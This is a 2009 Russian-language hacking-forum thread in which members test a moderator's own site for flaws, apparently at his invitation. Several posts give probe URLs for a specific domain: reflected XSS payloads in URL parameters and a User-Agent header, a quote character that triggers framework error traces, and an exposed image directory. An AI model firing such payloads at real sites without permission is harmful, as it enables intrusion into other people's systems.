ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Проверка на уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 23.03.2009, 02:50
gibson
Moderator - Level 7
Регистрация: 24.02.2006
Сообщений: 447
Провел на форуме:
2872049

Репутация: 705
Отправить сообщение для gibson с помощью ICQ
По умолчанию

оО, скули и ксс там сразу отпадают, мб только если находиться в разработке как сейчас.

BlackSun: но на данный момент присутствует XSS

Последний раз редактировалось BlackSun; 23.03.2009 в 02:56..
 
Ответить с цитированием

  #12  
Старый 18.05.2009, 19:43
eLWAux
Members of Antichat - Level 5
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме:
5111568

Репутация: 2399


Отправить сообщение для eLWAux с помощью ICQ
По умолчанию

http://fun.gibs0n.name/index.php/mainpage/category/id/'2
Цитата:
251. {
252. if (!$condition)
253. {
254. throw new sfError404Exception($this->get404Message($message));
255. }
256. }
257. public function forward404If($condition, $message = null)
 
Ответить с цитированием

  #13  
Старый 18.05.2009, 19:45
eLWAux
Members of Antichat - Level 5
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме:
5111568

Репутация: 2399


Отправить сообщение для eLWAux с помощью ICQ
По умолчанию

xss:
http://fun.gibs0n.name/index.php/mainpage/category/id/'2<script>alert(/SiXss/);</script>
 
Ответить с цитированием

  #14  
Старый 18.05.2009, 19:49
eLWAux
Members of Antichat - Level 5
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме:
5111568

Репутация: 2399


Отправить сообщение для eLWAux с помощью ICQ
По умолчанию

смотрим линк картинки:
http://fun.gibs0n.name/index.php/mainpage/view?id=2
[i]http://fun.gibs0n.name/img/2009/03/3c3a7891a6cabfd38c26673a7c712ec4.jpg[i]
смотрим в папку:
http://fun.gibs0n.name/img/2009/03/ ошибка
Цитата:
706. {
707. $this->dispatcher->notify(new sfEvent($this, 'application.log', array(sprintf('Action "%s/%s" does not exist', $moduleName, $actionName))));
708. }
709. throw new sfError404Exception(sprintf('Action "%s/%s" does not exist.', $moduleName, $actionName));
710. }
711. $actionInstance = $this->getAction($moduleName, $actionName);
712. $this->getActionStack()->addEntry($moduleName, $actionName, $actionInstance);

XSS
http://fun.gibs0n.name/img/2009/03/
в User-Agent: <script>alert(/xss/);</script>
 
Ответить с цитированием

  #15  
Старый 18.05.2009, 19:52
eLWAux
Members of Antichat - Level 5
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме:
5111568

Репутация: 2399


Отправить сообщение для eLWAux с помощью ICQ
По умолчанию

perhaps Overfload:
http://fun.gibs0n.name/index.php/mainpage/view?id=22222222222222

xss:
http://fun.gibs0n.name/index.php/mainpage/view?id=22222222222222<script>alert(/x/);</script>
http://fun.gibs0n.name/index.php/mainpage/view?id=22222222222222
User-Agent: <script>alert(/xss/);</script>
 
Ответить с цитированием

  #16  
Старый 14.08.2009, 13:22
gibson
Moderator - Level 7
Регистрация: 24.02.2006
Сообщений: 447
Провел на форуме:
2872049

Репутация: 705
Отправить сообщение для gibson с помощью ICQ
По умолчанию

Прикрутил поиск с помощью Sphinx. Знаю, что это немного глупо, но вещь действительно мощная и очень гибка. Поиск осуществлять одно удовольствие. Если кто знает как осуществлять переиндексацию, просьба отписаться в ПМ.

http://gibs0n.name/search

Появился новый поддомен http://fun.gibs0n.name - пока в стадии разработки. Пока не знаю что там и как сделать, если у кого есть предложения, отписываемся в ПМ, постараюсь реализовать.

предложения/пожелания в ПМ

Последний раз редактировалось BlackSun; 14.08.2009 в 13:48..
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ